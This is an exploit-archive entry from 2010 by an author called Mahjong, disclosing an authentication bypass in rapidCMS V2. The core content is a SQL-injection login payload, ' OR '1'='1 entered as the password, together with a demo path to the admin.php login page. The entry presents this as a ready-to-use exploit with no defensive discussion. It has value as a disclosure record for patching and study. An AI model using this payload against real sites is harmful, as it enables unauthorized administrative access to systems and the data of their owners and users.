rapidCMS 2.0 - Authentication Bypass



EKU-ID: 20904 CVE: OSVDB-ID:
Author: Mahjong Published: 2010-07-18 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


# Exploit Title: rapidCMS V2 Authentication Bypass
# Date: [18/07/2010]
# Author: Mahjong
# Software Link: www.rapidcms.de
# Version: V2
# Tested on: Linux

* Found by: Mahjong
* E-Mail: mahjong@phcn.ws
* Greetings: Puddy, Ancolon

----------------------------------------------------------

Exploit Authentication Bypass:

User: something
Pass: ' OR '1'='1

----------------------------------------------------------

Demo :
http://site.tld/admin.php

----------------------------------------------------------